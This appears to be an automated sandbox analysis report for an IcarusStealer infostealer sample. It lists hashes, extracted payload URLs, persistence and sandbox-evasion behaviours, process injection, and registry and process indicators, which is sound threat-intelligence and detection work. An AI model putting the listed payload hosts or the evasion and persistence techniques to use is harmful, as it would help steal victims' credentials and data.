icarusstealer | a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d

Analysis

max time kernel
299s
max time network
300s
platform
windows10-1703_x64
resource
win10-20240221-en
resource tags

arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
submitted
08/03/2024, 01:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

switched_1.exe
Size

3.7MB
MD5

b9bbe31d276de5c3d05352d070ae4244
SHA1

5e1bb67b01c579b4e0ad5a7475ceb657201c27ec
SHA256

a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d
SHA512

0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17
SSDEEP

49152:tYDJ4w53qs7fg442ZvkOlVdP8iFoh/dYINv7sq8:e4u3cV/gHP8X1hNv7

Score

10^/10

icarusstealer persistence stealer

Malware Config

Extracted

Family

icarusstealer

Attributes

payload_url
https://blackhatsec.org/add.jpg

https://blackhatsec.org/remove.jpg

Signatures

IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
stealer icarusstealer

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Executes dropped EXE 3 IoCs

pid	Process
4164	pulse x loader.exe
424	tesetey.exe
516	Start.exe

Enumerates connected drives 3 TTPs 2 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
12	raw.githubusercontent.com
15	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
20	ipinfo.io

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 424 set thread context of 3936	424	tesetey.exe	85

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\2717123927\3950266016.pri	explorer.exe
File created	C:\Windows\rescache\_merged\1601268389\3877292338.pri	SearchUI.exe
File created	C:\Windows\rescache\_merged\4032412167\2900507189.pri	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 22 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchUI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchUI.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Internet Explorer\GPU	SearchUI.exe

Modifies registry class 29 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchUI.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23"	SearchUI.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010005000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002c100000000000002000000e80703004100720067006a006200650078002000200033000a005600610067007200650061007200670020006e007000700072006600660000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000074ae2078e323294282c1e41cb67d5b9c0000000000000000000000003ab77645fa70da0100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e80703004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000073ae2078e323294282c1e41cb67d5b9c000000000000000000000000ca44f244fa70da0100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b00360051003800300039003300370037002d0036004e00530030002d003400340034004f002d0038003900350037002d004e00330037003700330053003000320032003000300052007d005c004a0076006100710062006a0066002000510072007300720061007100720065005c005a0046004e00460050006800760059002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000000000000e80702004e0070006700760062006100660020006100720072007100720071002e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000fffffffff9a6406d323dcb4f8a86be992e03dc76000000000000000000000000584a3b1fa164da0100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133529781115492196"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana	SearchUI.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56"	SearchUI.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
424	tesetey.exe
516	Start.exe
2144	powershell.exe
516	Start.exe
4616	powershell.exe
2144	powershell.exe
4616	powershell.exe
516	Start.exe
2144	powershell.exe
4616	powershell.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe
516	Start.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4164	pulse x loader.exe

Suspicious use of AdjustPrivilegeToken 31 IoCs

description	pid	Process
Token: SeDebugPrivilege	424	tesetey.exe
Token: SeShutdownPrivilege	3596	explorer.exe
Token: SeCreatePagefilePrivilege	3596	explorer.exe
Token: SeShutdownPrivilege	3596	explorer.exe
Token: SeCreatePagefilePrivilege	3596	explorer.exe
Token: SeDebugPrivilege	3936	cvtres.exe
Token: SeShutdownPrivilege	3596	explorer.exe
Token: SeCreatePagefilePrivilege	3596	explorer.exe
Token: SeShutdownPrivilege	3596	explorer.exe
Token: SeCreatePagefilePrivilege	3596	explorer.exe
Token: SeDebugPrivilege	516	Start.exe
Token: SeDebugPrivilege	2144	powershell.exe
Token: SeDebugPrivilege	4616	powershell.exe
Token: SeShutdownPrivilege	3596	explorer.exe
Token: SeCreatePagefilePrivilege	3596	explorer.exe
Token: SeShutdownPrivilege	3596	explorer.exe
Token: SeCreatePagefilePrivilege	3596	explorer.exe
Token: SeShutdownPrivilege	3596	explorer.exe
Token: SeCreatePagefilePrivilege	3596	explorer.exe
Token: SeShutdownPrivilege	3596	explorer.exe
Token: SeCreatePagefilePrivilege	3596	explorer.exe
Token: SeShutdownPrivilege	3596	explorer.exe
Token: SeCreatePagefilePrivilege	3596	explorer.exe
Token: SeShutdownPrivilege	3596	explorer.exe
Token: SeCreatePagefilePrivilege	3596	explorer.exe
Token: SeShutdownPrivilege	3596	explorer.exe
Token: SeCreatePagefilePrivilege	3596	explorer.exe
Token: SeShutdownPrivilege	3596	explorer.exe
Token: SeCreatePagefilePrivilege	3596	explorer.exe
Token: SeShutdownPrivilege	3596	explorer.exe
Token: SeCreatePagefilePrivilege	3596	explorer.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
